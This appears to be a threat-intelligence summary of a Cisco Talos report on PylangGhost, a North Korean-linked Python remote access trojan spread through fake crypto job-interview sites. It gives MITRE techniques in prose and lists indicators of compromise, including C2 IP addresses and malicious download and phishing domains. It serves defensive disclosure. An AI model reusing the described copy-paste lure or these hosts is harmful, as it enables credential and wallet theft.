Cisco Talos uncovered a new Python-based remote access trojan (RAT) named PylangGhost, used exclusively by the North Korean-aligned threat actor Famous Chollima to target Windows users in cryptocurrency and blockchain sectors. This Python RAT is functionally similar to the GolangGhost RAT, which targets MacOS, and both are deployed via fake job interview websites that trick victims into running malicious commands. #PylangGhost #GolangGhost #FamousChollima
Keypoints
- Cisco Talos identified PylangGhost, a Python-based RAT variant used by Famous Chollima, a North Korean-aligned threat actor, targeting Windows systems.
- The RAT is functionally similar to GolangGhost, previously used against MacOS, with both versions stealing credentials from over 80 browser extensions including cryptocurrency wallets.
- Attacks utilize fake job interview websites impersonating companies such as Coinbase, Robinhood, and Uniswap to target professionals in cryptocurrency and blockchain fields.
- Victims are instructed to copy and execute malicious commands to install a trojan disguised as video drivers, delivered differently based on OS and browser fingerprinting.
- PylangGhost consists of six Python modules that enable system persistence, remote control, data theft, and encrypted command and control communication using RC4.
- The campaign primarily targets individuals in India; no affected Cisco users have been detected by telemetry.
- Cisco security products like Secure Endpoint, Secure Email, and Umbrella can detect and block this threat effectively.
MITRE Techniques
- [T1059] Command and Scripting Interpreter – The RAT uses malicious command lines for initial execution instructing users to copy and paste commands (“…user to copy, paste and execute a command…”).
- [T1105] Ingress Tool Transfer – The payload and modules are downloaded using PowerShell Invoke-WebRequest or curl commands (“…to download a ZIP file containing the PylangGhost modules…”).
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – PylangGhost creates a registry value to persist and launch on user logon (“It creates a registry value to launch the RAT every time user logs onto the system…”).
- [T1027] Obfuscated Files or Information – Modules are packed in ZIP files and launched using a renamed Python interpreter to evade detection (“…unzipping the Python library stored in the “lib.zip file” and launching the trojan…”).
- [T1071.001] Application Layer Protocol: Web Protocols – Communication with C2 server uses HTTP with RC4 encrypted packets (“…using RC4 encryption to encrypt packets over otherwise unencrypted HTTP…”).
- [T1213] Data from Information Repositories – Theft of credentials and cookies from over 80 browser extensions and password managers (“…theft of cookies and credentials from over 80 browser extensions including Metamask…”).
- [T1106] Execution Through API – The RAT runs commands and opens an OS shell for remote control (“…launch an OS shell for remote access and control of the infected system…”).
Indicators of Compromise
- [SHA256 Hashes] Python modules and associated files – e.g., a206ea9b415a0eafd731b4eec762a5b5e8df8d9007e93046029d83316989790a, c2137cd870de0af6662f56c97d27b86004f47b866ab27190a97bde7518a9ac1b.
- [C2 Servers] Command and control IP addresses – 31.57.243.29:8080, 154.58.204.15:8080, and others.
- [Download Domains] Malicious download hostnames used to serve payloads – api.quickcamfix.online, api.nvidia-release.us, api.autodriverfix.online, among others.
- [Fake Job Interview Domains] Domains hosting phishing and skill-testing pages – krakenhire.com, coinbase.talenthiringtool.com, robinhood.ecareerscan.com, uniswap.prehireiq.com, and many others.
Read more: https://blog.talosintelligence.com/python-version-of-golangghost-rat/